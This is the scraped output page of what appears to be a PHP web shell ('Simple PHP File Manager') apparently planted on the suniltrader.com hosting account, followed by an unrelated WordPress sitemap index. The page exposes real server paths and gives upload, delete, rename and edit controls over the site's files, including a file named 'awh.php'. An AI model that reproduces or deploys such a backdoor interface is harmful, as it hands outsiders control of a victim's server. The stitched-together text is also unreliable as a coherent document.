
<!DOCTYPE html>
<html>
<head>
    <title>Simple PHP File Manager</title>
</head>
<body>
    <h1>File Manager</h1>
    <p>Current Path: <a href="?dir=/">Root</a> / <a href="?dir=%2Fhome%2F">home</a> / <a href="?dir=%2Fhome%2Fu559976240%2F">u559976240</a> / <a href="?dir=%2Fhome%2Fu559976240%2Fdomains%2F">domains</a> / <a href="?dir=%2Fhome%2Fu559976240%2Fdomains%2Fsuniltrader.com%2F">suniltrader.com</a></p>

    <!-- Form Upload -->
    <h2>Upload File</h2>
    <form method="post" enctype="multipart/form-data">
        <input type="file" name="file">
        <input type="submit" name="upload" value="Upload">
    </form>

    <!-- List Files and Folders -->
    <h2>Files and Folders</h2>
    <table border="1">
        <tr><th>Name</th><th>Actions</th></tr>
        <tr><td>DO_NOT_UPLOAD_HERE</td><td><a href="?dir=%2Fhome%2Fu559976240%2Fdomains%2Fsuniltrader.com%2F&delete=DO_NOT_UPLOAD_HERE" onclick="return confirm('Delete?')">Delete</a> | <form method="post" style="display:inline;">
                        <input type="hidden" name="rename_old" value="DO_NOT_UPLOAD_HERE">
                        <input type="text" name="rename_new" placeholder="New name">
                        <input type="submit" value="Rename">
                      </form> | <a href="?dir=%2Fhome%2Fu559976240%2Fdomains%2Fsuniltrader.com%2F&edit=DO_NOT_UPLOAD_HERE">Edit</a></td></tr><tr><td>awh.php</td><td><a href="?dir=%2Fhome%2Fu559976240%2Fdomains%2Fsuniltrader.com%2F&delete=awh.php" onclick="return confirm('Delete?')">Delete</a> | <form method="post" style="display:inline;">
                        <input type="hidden" name="rename_old" value="awh.php">
                        <input type="text" name="rename_new" placeholder="New name">
                        <input type="submit" value="Rename">
                      </form> | <a href="?dir=%2Fhome%2Fu559976240%2Fdomains%2Fsuniltrader.com%2F&edit=awh.php">Edit</a></td></tr><tr><td><a href="?dir=%2Fhome%2Fu559976240%2Fdomains%2Fsuniltrader.com%2Fpublic_html">public_html/</a></td><td><a href="?dir=%2Fhome%2Fu559976240%2Fdomains%2Fsuniltrader.com%2F&delete=public_html" onclick="return confirm('Delete?')">Delete</a> | <form method="post" style="display:inline;">
                        <input type="hidden" name="rename_old" value="public_html">
                        <input type="text" name="rename_new" placeholder="New name">
                        <input type="submit" value="Rename">
                      </form></td></tr>    </table>

    <!-- Navigasi ke parent jika bukan root -->
            <p><a href="?dir=%2Fhome%2Fu559976240%2Fdomains">Go to Parent Directory</a></p>
    </body>
</html>
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://suniltrader.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://suniltrader.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://suniltrader.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://suniltrader.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://suniltrader.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
